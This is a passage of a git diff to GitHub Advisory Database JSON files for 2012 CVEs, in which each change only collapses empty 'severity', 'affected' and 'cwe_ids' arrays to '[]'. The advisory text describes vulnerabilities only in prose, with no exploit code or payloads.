"type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hvjv-r7f5-rgrv/GHSA-hvjv-r7f5-rgrv.json b/advisories/unreviewed/2022/05/GHSA-hvjv-r7f5-rgrv/GHSA-hvjv-r7f5-rgrv.json index 1c38561988b..70c3e9b6200 100644 --- a/advisories/unreviewed/2022/05/GHSA-hvjv-r7f5-rgrv/GHSA-hvjv-r7f5-rgrv.json +++ b/advisories/unreviewed/2022/05/GHSA-hvjv-r7f5-rgrv/GHSA-hvjv-r7f5-rgrv.json @@ -7,12 +7,8 @@ "CVE-2012-0925" ], "details": "Unspecified vulnerability in the RV40 codec in RealNetworks RealPlayer 11.x, 14.x, and 15.x before 15.02.71, and RealPlayer SP 1.0 through 1.1.5, allows remote attackers to execute arbitrary code via a crafted RV40 RealVideo video stream.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hvmv-7fff-rwxv/GHSA-hvmv-7fff-rwxv.json b/advisories/unreviewed/2022/05/GHSA-hvmv-7fff-rwxv/GHSA-hvmv-7fff-rwxv.json index 9ebf5ee6f51..23ee47acb41 100644 --- a/advisories/unreviewed/2022/05/GHSA-hvmv-7fff-rwxv/GHSA-hvmv-7fff-rwxv.json +++ b/advisories/unreviewed/2022/05/GHSA-hvmv-7fff-rwxv/GHSA-hvmv-7fff-rwxv.json @@ -7,12 +7,8 @@ "CVE-2012-3131" ], "details": "Unspecified vulnerability in Oracle Sun Solaris 9, 10, and 11 allows remote attackers to affect confidentiality, related to Network/NFS.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hw94-hjqx-fmc3/GHSA-hw94-hjqx-fmc3.json b/advisories/unreviewed/2022/05/GHSA-hw94-hjqx-fmc3/GHSA-hw94-hjqx-fmc3.json index c46a65a38d6..c6767c1508a 100644 --- a/advisories/unreviewed/2022/05/GHSA-hw94-hjqx-fmc3/GHSA-hw94-hjqx-fmc3.json +++ b/advisories/unreviewed/2022/05/GHSA-hw94-hjqx-fmc3/GHSA-hw94-hjqx-fmc3.json @@ -7,12 +7,8 @@ "CVE-2012-2080" ], "details": "Cross-site request forgery (CSRF) vulnerability in the Node Limit Number module before 6.x-1.2 for Drupal allows remote attackers to hijack the authentication of users with the administer node limitnumber permission for requests that delete limits.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hw9r-6w9j-rhxp/GHSA-hw9r-6w9j-rhxp.json b/advisories/unreviewed/2022/05/GHSA-hw9r-6w9j-rhxp/GHSA-hw9r-6w9j-rhxp.json index d80514e037c..345a41499da 100644 --- a/advisories/unreviewed/2022/05/GHSA-hw9r-6w9j-rhxp/GHSA-hw9r-6w9j-rhxp.json +++ b/advisories/unreviewed/2022/05/GHSA-hw9r-6w9j-rhxp/GHSA-hw9r-6w9j-rhxp.json @@ -7,12 +7,8 @@ "CVE-2012-3126" ], "details": "Unspecified vulnerability in the Solaris Cluster component in Oracle Sun Products Suite 3.3 allows local users to affect confidentiality, integrity, and availability via unknown vectors related to Apache Tomcat Agent.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j2q2-c799-v633/GHSA-j2q2-c799-v633.json b/advisories/unreviewed/2022/05/GHSA-j2q2-c799-v633/GHSA-j2q2-c799-v633.json index e458a654afb..534bbf32605 100644 --- a/advisories/unreviewed/2022/05/GHSA-j2q2-c799-v633/GHSA-j2q2-c799-v633.json +++ b/advisories/unreviewed/2022/05/GHSA-j2q2-c799-v633/GHSA-j2q2-c799-v633.json @@ -7,12 +7,8 @@ "CVE-2012-1212" ], "details": "Cross-site scripting (XSS) vulnerability in the smwfOnSfSetTargetName function in extensions/SMWHalo/includes/SMW_Initialize.php in Semantic Enterprise Wiki (SMW+) 1.5.6, 1.6.0_2 and earlier allows remote attackers to inject arbitrary web script or HTML via the target parameter to index.php/Special:FormEdit. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j2rg-f9wv-hrc6/GHSA-j2rg-f9wv-hrc6.json b/advisories/unreviewed/2022/05/GHSA-j2rg-f9wv-hrc6/GHSA-j2rg-f9wv-hrc6.json index fbd85e3c23a..459d101e444 100644 --- a/advisories/unreviewed/2022/05/GHSA-j2rg-f9wv-hrc6/GHSA-j2rg-f9wv-hrc6.json +++ b/advisories/unreviewed/2022/05/GHSA-j2rg-f9wv-hrc6/GHSA-j2rg-f9wv-hrc6.json @@ -7,12 +7,8 @@ "CVE-2012-0899" ], "details": "Cross-site scripting (XSS) vulnerability in referencement/sites_inscription.php in Annuaire PHP allows remote attackers to inject arbitrary web script or HTML via the url parameter and possibly the nom parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j2vx-f3wv-m824/GHSA-j2vx-f3wv-m824.json b/advisories/unreviewed/2022/05/GHSA-j2vx-f3wv-m824/GHSA-j2vx-f3wv-m824.json index 195dd5c2d59..4bdf17c9a4b 100644 --- a/advisories/unreviewed/2022/05/GHSA-j2vx-f3wv-m824/GHSA-j2vx-f3wv-m824.json +++ b/advisories/unreviewed/2022/05/GHSA-j2vx-f3wv-m824/GHSA-j2vx-f3wv-m824.json @@ -7,12 +7,8 @@ "CVE-2012-1634" ], "details": "Cross-site scripting (XSS) vulnerability in video_filter.codecs.inc in the Video Filter module 6.x-2.x and 7.x-2.x for Drupal allows remote attackers to inject arbitrary web script or HTML via the EMBEDLOOKUP parameter for Blip.tv links.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j2wx-cxw5-x6rh/GHSA-j2wx-cxw5-x6rh.json b/advisories/unreviewed/2022/05/GHSA-j2wx-cxw5-x6rh/GHSA-j2wx-cxw5-x6rh.json index c69cb1e3344..4ad74d2da53 100644 --- a/advisories/unreviewed/2022/05/GHSA-j2wx-cxw5-x6rh/GHSA-j2wx-cxw5-x6rh.json +++ b/advisories/unreviewed/2022/05/GHSA-j2wx-cxw5-x6rh/GHSA-j2wx-cxw5-x6rh.json @@ -7,12 +7,8 @@ "CVE-2012-1785" ], "details": "kg_callffmpeg.php in the Video Embed & Thumbnail Generator plugin before 2.0 for WordPress allows remote attackers to execute arbitrary commands via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j3rr-79qq-g9pm/GHSA-j3rr-79qq-g9pm.json b/advisories/unreviewed/2022/05/GHSA-j3rr-79qq-g9pm/GHSA-j3rr-79qq-g9pm.json index e572e0b8fdf..56be1df1c12 100644 --- a/advisories/unreviewed/2022/05/GHSA-j3rr-79qq-g9pm/GHSA-j3rr-79qq-g9pm.json +++ b/advisories/unreviewed/2022/05/GHSA-j3rr-79qq-g9pm/GHSA-j3rr-79qq-g9pm.json @@ -7,12 +7,8 @@ "CVE-2012-0744" ], "details": "IBM Rational ClearQuest 7.1.x through 7.1.2.7 and 8.x through 8.0.0.3 allows remote attackers to obtain potentially sensitive information via a request to a (1) snoop, (2) hello, (3) ivt/, (4) hitcount, (5) HitCount.jsp, (6) HelloHTMLError.jsp, (7) HelloHTML.jsp, (8) HelloVXMLError.jsp, (9) HelloVXML.jsp, (10) HelloWMLError.jsp, (11) HelloWML.jsp, or (12) cqweb/j_security_check sample script.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j4cx-8j85-q6qg/GHSA-j4cx-8j85-q6qg.json b/advisories/unreviewed/2022/05/GHSA-j4cx-8j85-q6qg/GHSA-j4cx-8j85-q6qg.json index 84c01d492f9..8aa15137dae 100644 --- a/advisories/unreviewed/2022/05/GHSA-j4cx-8j85-q6qg/GHSA-j4cx-8j85-q6qg.json +++ b/advisories/unreviewed/2022/05/GHSA-j4cx-8j85-q6qg/GHSA-j4cx-8j85-q6qg.json @@ -7,12 +7,8 @@ "CVE-2012-1650" ], "details": "The ZipCart module 6.x before 6.x-1.4 for Drupal checks the \"access content\" permission instead of the \"access ZipCart downloads\" permission when building archives, which allows remote authenticated users with access content permission to bypass intended access restrictions.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j4gm-x6g4-hpxh/GHSA-j4gm-x6g4-hpxh.json b/advisories/unreviewed/2022/05/GHSA-j4gm-x6g4-hpxh/GHSA-j4gm-x6g4-hpxh.json index 118a4107bb9..a246c137d74 100644 --- a/advisories/unreviewed/2022/05/GHSA-j4gm-x6g4-hpxh/GHSA-j4gm-x6g4-hpxh.json +++ b/advisories/unreviewed/2022/05/GHSA-j4gm-x6g4-hpxh/GHSA-j4gm-x6g4-hpxh.json @@ -7,12 +7,8 @@ "CVE-2012-1727" ], "details": "Unspecified vulnerability in the Oracle Application Object Library component in Oracle E-Business Suite 11.5.10.2, 12.0.4, 12.0.6, 12.1.1, 12.1.2, and 12.1.3 allows remote authenticated users to affect integrity via unknown vectors related to Document Repository.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j566-76wv-3qrw/GHSA-j566-76wv-3qrw.json b/advisories/unreviewed/2022/05/GHSA-j566-76wv-3qrw/GHSA-j566-76wv-3qrw.json index e647e087758..941b16034fc 100644 --- a/advisories/unreviewed/2022/05/GHSA-j566-76wv-3qrw/GHSA-j566-76wv-3qrw.json +++ b/advisories/unreviewed/2022/05/GHSA-j566-76wv-3qrw/GHSA-j566-76wv-3qrw.json @@ -7,12 +7,8 @@ "CVE-2012-1556" ], "details": "Cross-site scripting (XSS) vulnerability in Synology Photo Station 5 for DiskStation Manager (DSM) 3.2-1955 allows remote attackers to inject arbitrary web script or HTML via the name parameter to photo/photo_one.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j56q-2899-9w2x/GHSA-j56q-2899-9w2x.json b/advisories/unreviewed/2022/05/GHSA-j56q-2899-9w2x/GHSA-j56q-2899-9w2x.json index 18d6bd8586e..26341be32b0 100644 --- a/advisories/unreviewed/2022/05/GHSA-j56q-2899-9w2x/GHSA-j56q-2899-9w2x.json +++ b/advisories/unreviewed/2022/05/GHSA-j56q-2899-9w2x/GHSA-j56q-2899-9w2x.json @@ -7,12 +7,8 @@ "CVE-2012-2901" ], "details": "Cross-site scripting (XSS) vulnerability in the Profile List in the Joomla Content Editor (JCE) component before 2.1 for Joomla! allows remote attackers to inject arbitrary web script or HTML via the search parameter to administrator/index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j677-22c6-m653/GHSA-j677-22c6-m653.json b/advisories/unreviewed/2022/05/GHSA-j677-22c6-m653/GHSA-j677-22c6-m653.json index 83444ff90b8..03d71b4e07d 100644 --- a/advisories/unreviewed/2022/05/GHSA-j677-22c6-m653/GHSA-j677-22c6-m653.json +++ b/advisories/unreviewed/2022/05/GHSA-j677-22c6-m653/GHSA-j677-22c6-m653.json @@ -7,12 +7,8 @@ "CVE-2012-1078" ], "details": "The System Utilities (sysutils) extension 1.0.3 and earlier for TYPO3 allows remote attackers to obtain sensitive information via unspecified vectors related to improper \"protection\" of the \"backup output directory.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j67g-xx3g-mcgp/GHSA-j67g-xx3g-mcgp.json b/advisories/unreviewed/2022/05/GHSA-j67g-xx3g-mcgp/GHSA-j67g-xx3g-mcgp.json index 8ead60c9beb..bc2736452a6 100644 --- a/advisories/unreviewed/2022/05/GHSA-j67g-xx3g-mcgp/GHSA-j67g-xx3g-mcgp.json +++ b/advisories/unreviewed/2022/05/GHSA-j67g-xx3g-mcgp/GHSA-j67g-xx3g-mcgp.json @@ -7,12 +7,8 @@ "CVE-2012-1687" ], "details": "Unspecified vulnerability in Oracle Solaris 10 and 11 allows local users to affect integrity and availability, related to Logical Domains (LDOM).", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j6jw-jf8w-x7pq/GHSA-j6jw-jf8w-x7pq.json b/advisories/unreviewed/2022/05/GHSA-j6jw-jf8w-x7pq/GHSA-j6jw-jf8w-x7pq.json index 8ee9f06528a..c6a540ad710 100644 --- a/advisories/unreviewed/2022/05/GHSA-j6jw-jf8w-x7pq/GHSA-j6jw-jf8w-x7pq.json +++ b/advisories/unreviewed/2022/05/GHSA-j6jw-jf8w-x7pq/GHSA-j6jw-jf8w-x7pq.json @@ -7,12 +7,8 @@ "CVE-2012-1222" ], "details": "Stack-based buffer overflow in RabidHamster R2/Extreme 1.65 and earlier allows remote authenticated users to execute arbitrary code via a long string to TCP port 23.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j777-rfjc-qr5x/GHSA-j777-rfjc-qr5x.json b/advisories/unreviewed/2022/05/GHSA-j777-rfjc-qr5x/GHSA-j777-rfjc-qr5x.json index 57a9e9acb73..9e8efc80792 100644 --- a/advisories/unreviewed/2022/05/GHSA-j777-rfjc-qr5x/GHSA-j777-rfjc-qr5x.json +++ b/advisories/unreviewed/2022/05/GHSA-j777-rfjc-qr5x/GHSA-j777-rfjc-qr5x.json @@ -7,12 +7,8 @@ "CVE-2012-0898" ], "details": "Directory traversal vulnerability in meb_download.php in the myEASYbackup plugin 1.0.8.1 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dwn_file parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j797-qw8v-chcq/GHSA-j797-qw8v-chcq.json b/advisories/unreviewed/2022/05/GHSA-j797-qw8v-chcq/GHSA-j797-qw8v-chcq.json index 615fc769628..636fd481d03 100644 --- a/advisories/unreviewed/2022/05/GHSA-j797-qw8v-chcq/GHSA-j797-qw8v-chcq.json +++ b/advisories/unreviewed/2022/05/GHSA-j797-qw8v-chcq/GHSA-j797-qw8v-chcq.json @@ -7,12 +7,8 @@ "CVE-2012-0984" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in XOOPS before 2.5.5 allow remote attackers to inject arbitrary web script or HTML via the (1) to_userid parameter to modules/pm/pmlite.php or the (2) current_file, (3) imgcat_id, or (4) target parameter to class/xoopseditor/tinymce/tinymce/jscripts/tiny_mce/plugins/xoopsimagemanager/xoopsimagebrowser.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j7q8-hh4q-9hpf/GHSA-j7q8-hh4q-9hpf.json b/advisories/unreviewed/2022/05/GHSA-j7q8-hh4q-9hpf/GHSA-j7q8-hh4q-9hpf.json index ff61a01b0ed..0eb4b89fae9 100644 --- a/advisories/unreviewed/2022/05/GHSA-j7q8-hh4q-9hpf/GHSA-j7q8-hh4q-9hpf.json +++ b/advisories/unreviewed/2022/05/GHSA-j7q8-hh4q-9hpf/GHSA-j7q8-hh4q-9hpf.json @@ -7,12 +7,8 @@ "CVE-2012-2909" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in Viscacha 0.8.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) text field in the Private Messages System, (2) Bad Word field in Zensur, or (3) Portal or (4) Topic field in Kommentar.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j7x4-p5fv-986c/GHSA-j7x4-p5fv-986c.json b/advisories/unreviewed/2022/05/GHSA-j7x4-p5fv-986c/GHSA-j7x4-p5fv-986c.json index 873bee7501e..f4ba3bb311c 100644 --- a/advisories/unreviewed/2022/05/GHSA-j7x4-p5fv-986c/GHSA-j7x4-p5fv-986c.json +++ b/advisories/unreviewed/2022/05/GHSA-j7x4-p5fv-986c/GHSA-j7x4-p5fv-986c.json @@ -7,12 +7,8 @@ "CVE-2012-0762" ], "details": "The Shockwave 3D Asset component in Adobe Shockwave Player before 11.6.4.634 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-0757, CVE-2012-0760, CVE-2012-0761, CVE-2012-0763, CVE-2012-0764, and CVE-2012-0766.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j848-h89c-pqhf/GHSA-j848-h89c-pqhf.json b/advisories/unreviewed/2022/05/GHSA-j848-h89c-pqhf/GHSA-j848-h89c-pqhf.json index 26d46763dac..206f3a07f78 100644 --- a/advisories/unreviewed/2022/05/GHSA-j848-h89c-pqhf/GHSA-j848-h89c-pqhf.json +++ b/advisories/unreviewed/2022/05/GHSA-j848-h89c-pqhf/GHSA-j848-h89c-pqhf.json @@ -7,12 +7,8 @@ "CVE-2012-2206" ], "details": "The Web Gateway component in IBM WebSphere MQ File Transfer Edition 7.0.4 and earlier allows remote authenticated users to read files of arbitrary users via vectors involving a username in a URI, as demonstrated by a modified metadata=fteSamplesUser field to the /transfer URI.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-j9r4-8gpw-9hh6/GHSA-j9r4-8gpw-9hh6.json b/advisories/unreviewed/2022/05/GHSA-j9r4-8gpw-9hh6/GHSA-j9r4-8gpw-9hh6.json index 7725886c48d..8d441bee08f 100644 --- a/advisories/unreviewed/2022/05/GHSA-j9r4-8gpw-9hh6/GHSA-j9r4-8gpw-9hh6.json +++ b/advisories/unreviewed/2022/05/GHSA-j9r4-8gpw-9hh6/GHSA-j9r4-8gpw-9hh6.json @@ -7,12 +7,8 @@ "CVE-2012-2920" ], "details": "Cross-site scripting (XSS) vulnerability in the userphoto_options_page function in user-photo.php in the User Photo plugin before 0.9.5.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO to wp-admin/options-general.php. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-j9xm-57c9-67cv/GHSA-j9xm-57c9-67cv.json b/advisories/unreviewed/2022/05/GHSA-j9xm-57c9-67cv/GHSA-j9xm-57c9-67cv.json index 854099d881a..770ec589873 100644 --- a/advisories/unreviewed/2022/05/GHSA-j9xm-57c9-67cv/GHSA-j9xm-57c9-67cv.json +++ b/advisories/unreviewed/2022/05/GHSA-j9xm-57c9-67cv/GHSA-j9xm-57c9-67cv.json @@ -7,12 +7,8 @@ "CVE-2012-2151" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in SPIP 1.9.x before 1.9.2.o, 2.0.x before 2.0.18, and 2.1.x before 2.1.13 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jcg4-8f77-2hmc/GHSA-jcg4-8f77-2hmc.json b/advisories/unreviewed/2022/05/GHSA-jcg4-8f77-2hmc/GHSA-jcg4-8f77-2hmc.json index f267a6d06bb..8871194cd69 100644 --- a/advisories/unreviewed/2022/05/GHSA-jcg4-8f77-2hmc/GHSA-jcg4-8f77-2hmc.json +++ b/advisories/unreviewed/2022/05/GHSA-jcg4-8f77-2hmc/GHSA-jcg4-8f77-2hmc.json @@ -7,12 +7,8 @@ "CVE-2012-3227" ], "details": "Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking component in Oracle Financial Services Software 10.0.0, 10.0.2, 10.1.0, 10.2.0, 10.2.2, 10.3.0, 10.5.0, and 11.0.0 through 11.2.0 allows remote authenticated users to affect integrity, related to BASE, a different vulnerability than CVE-2012-3141.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jfgv-j6m5-6xrj/GHSA-jfgv-j6m5-6xrj.json b/advisories/unreviewed/2022/05/GHSA-jfgv-j6m5-6xrj/GHSA-jfgv-j6m5-6xrj.json index 3ee96861311..4f2283baa64 100644 --- a/advisories/unreviewed/2022/05/GHSA-jfgv-j6m5-6xrj/GHSA-jfgv-j6m5-6xrj.json +++ b/advisories/unreviewed/2022/05/GHSA-jfgv-j6m5-6xrj/GHSA-jfgv-j6m5-6xrj.json @@ -7,12 +7,8 @@ "CVE-2012-3732" ], "details": "Mail in Apple iOS before 6 uses an S/MIME message's From address as the displayed sender address, which allows remote attackers to spoof signed content via an e-mail message in which the From field does not match the signer's identity.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -36,9 +32,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jfhj-r2mw-3r6p/GHSA-jfhj-r2mw-3r6p.json b/advisories/unreviewed/2022/05/GHSA-jfhj-r2mw-3r6p/GHSA-jfhj-r2mw-3r6p.json index 648b9515fb0..d14b2f508ca 100644 --- a/advisories/unreviewed/2022/05/GHSA-jfhj-r2mw-3r6p/GHSA-jfhj-r2mw-3r6p.json +++ b/advisories/unreviewed/2022/05/GHSA-jfhj-r2mw-3r6p/GHSA-jfhj-r2mw-3r6p.json @@ -7,12 +7,8 @@ "CVE-2012-2241" ], "details": "scripts/dget.pl in devscripts before 2.12.3 allows remote attackers to delete arbitrary files via a crafted (1) .dsc or (2) .changes file, probably related to a NULL byte in a filename.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jfx2-hhh9-pcg2/GHSA-jfx2-hhh9-pcg2.json b/advisories/unreviewed/2022/05/GHSA-jfx2-hhh9-pcg2/GHSA-jfx2-hhh9-pcg2.json index 3a8f0808953..fb0822b7839 100644 --- a/advisories/unreviewed/2022/05/GHSA-jfx2-hhh9-pcg2/GHSA-jfx2-hhh9-pcg2.json +++ b/advisories/unreviewed/2022/05/GHSA-jfx2-hhh9-pcg2/GHSA-jfx2-hhh9-pcg2.json @@ -7,12 +7,8 @@ "CVE-2012-0918" ], "details": "Unspecified vulnerability in Hitachi COBOL2002 Net Developer, Net Server Suite, and Net Client Suite 01-00, 01-01 through 01-01-/D, 01-02 through 01-02-/F, 01-03 through 01-03-/F, 02-00 through 02-00-/D, 02-01 through 02-01-/C, and possibly other versions before 02-01-/D allows remote attackers to execute arbitrary code via unknown attack vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -40,9 +36,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jgfv-fmg7-x4c2/GHSA-jgfv-fmg7-x4c2.json b/advisories/unreviewed/2022/05/GHSA-jgfv-fmg7-x4c2/GHSA-jgfv-fmg7-x4c2.json index ed7a9cdcbba..f37b6c0e874 100644 --- a/advisories/unreviewed/2022/05/GHSA-jgfv-fmg7-x4c2/GHSA-jgfv-fmg7-x4c2.json +++ b/advisories/unreviewed/2022/05/GHSA-jgfv-fmg7-x4c2/GHSA-jgfv-fmg7-x4c2.json @@ -7,12 +7,8 @@ "CVE-2011-5145" ], "details": "Multiple SQL injection vulnerabilities in Open Business Management (OBM) 2.4.0-rc13 and probably earlier allow remote authenticated users to execute arbitrary SQL commands via the (1) sel_domain_id or (2) action parameter to obm.php; (3) tf_user parameter in a search action to group/group_index.php; (4) tf_delegation, (5) tf_ip, (6) tf_name to host/host_index.php; or (7) lang, (8) theme, (9) cal_alert, (10) cal_first_hour, (11) cal_interval, (12) cal_last_hour, (13) commentorder, (14) csv_sep, (15) date, (16) date_upd, (17) debug_exe, (18) debug_id, (19) debug_param, (20) debug_sess, (21) debug_solr, (22) debug_sql, (23) dsrc, (24) menu, (25) rows, (26) sel_display_days, (27) timeformat, (28) timezone, or (29) todo parameter to settings/settings_index.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jh3f-4cfw-pgf7/GHSA-jh3f-4cfw-pgf7.json b/advisories/unreviewed/2022/05/GHSA-jh3f-4cfw-pgf7/GHSA-jh3f-4cfw-pgf7.json index 04fb4418468..4623cc6ac1f 100644 --- a/advisories/unreviewed/2022/05/GHSA-jh3f-4cfw-pgf7/GHSA-jh3f-4cfw-pgf7.json +++ b/advisories/unreviewed/2022/05/GHSA-jh3f-4cfw-pgf7/GHSA-jh3f-4cfw-pgf7.json @@ -7,12 +7,8 @@ "CVE-2012-3367" ], "details": "Red Hat Certificate System (RHCS) before 8.1.1 and Dogtag Certificate System does not properly check certificate revocation requests made through the web interface, which allows remote attackers with permissions to revoke end entity certificates to revoke the Certificate Authority (CA) certificate.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -52,9 +48,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-jh92-gg4f-jqfw/GHSA-jh92-gg4f-jqfw.json b/advisories/unreviewed/2022/05/GHSA-jh92-gg4f-jqfw/GHSA-jh92-gg4f-jqfw.json index 1dbbe02702a..fb9b0fe3747 100644 --- a/advisories/unreviewed/2022/05/GHSA-jh92-gg4f-jqfw/GHSA-jh92-gg4f-jqfw.json +++ b/advisories/unreviewed/2022/05/GHSA-jh92-gg4f-jqfw/GHSA-jh92-gg4f-jqfw.json @@ -7,12 +7,8 @@ "CVE-2012-3436" ], "details": "OpenTTD 0.6.0 through 1.2.1 does not properly validate requests to clear a water tile, which allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a certain sequence of steps related to \"the water/coast aspect of tiles which also have railtracks on one half.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-jjqc-5mxx-88h5/GHSA-jjqc-5mxx-88h5.json b/advisories/unreviewed/2022/05/GHSA-jjqc-5mxx-88h5/GHSA-jjqc-5mxx-88h5.json index 1b1b57e3701..17d418c6a1d 100644 --- a/advisories/unreviewed/2022/05/GHSA-jjqc-5mxx-88h5/GHSA-jjqc-5mxx-88h5.json +++ b/advisories/unreviewed/2022/05/GHSA-jjqc-5mxx-88h5/GHSA-jjqc-5mxx-88h5.json @@ -7,12 +7,8 @@ "CVE-2012-1663" ], "details": "Double free vulnerability in libgnutls in GnuTLS before 3.0.14 allows remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a crafted certificate list.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git 